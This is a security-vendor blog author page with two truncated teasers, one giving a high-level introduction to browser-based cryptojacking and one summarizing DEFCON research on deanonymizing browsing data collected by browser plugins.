Authentic8 Blog Author: Nicholas Espinoza

Nick is an engineer that supports the DoD, IC and LE community in tackling tough problems in collections, analysis, and exploitation. He previously worked with Palantir, BAH, and Recorded Future.

Cryptojacking 101

Illustration: Cryptojacking 101 - Authentic8 Blog

As an end user, cryptojacking (cryptocurrency mining at someone else's expense) poses a problem - someone is hogging up your computing power and immediately benefiting from you, without your knowledge.

To the miner, at first glance, this seems like a victimless crime, it's a passive activity, and the costs seem minimal, and the returns are hard earned cryptocurrency to spend on the open, deep, and dark web.

However, mining this currency comes at a high cost due to computational expenses (GPU, CPU usage), electricity costs (Source), and time for the cryptojacking victim.

Clever companies and individuals are looking for ways to leverage other individuals resources to mine cryptocurrency through embedding cryptomining scripts into websites serving up anything from webstores to video streams.

Let’s step through the mechanics, economy, and potential mechanisms to counter browser-based cryptojacking.

The Mechanics of Cryptojacking

Cryptojacking is simple:

  • a user navigates to a website or service controlled by the miner,
  • a CoinHive or similar client-side JavaScript is

Research: Deanonymizing Browser Data Made Easy

Illustration: Research: Deanonymizing Browser Data Made Easy - Authentic8 Blog

This year at DEFCON in Las Vegas, investigative journalist Svea Eckert and researcher Andreas Dewes demonstrated how to deanonymize browsing datasets they had acquired through major browser plugin providers with relative ease.

Their research resulted in a handful of significant findings:

  • 10 “privacy” plugins provided the most voluminous data sets.
  • Data provided is very granular.
  • Contrary to popular belief, deanonymization techniques aren’t novel with the majority being pattern matching rather than complex maths.
  • Using Publicly Available Information (PAI) for correlation makes deanonymization much simpler.

Let’s dig into their research [PDF] to identify the risks involved with plugin usage and techniques utilized for data exploitation. One notable finding even affected an active law enforcement investigation.

Browser Plugins as Data Providers

The security implications of using browser plugins are extensive. Risks abound - from download and installation over settings and permissions to possible user data monetization.

One data provider identified in the research was Web of Trust (WOT) - a plugin installed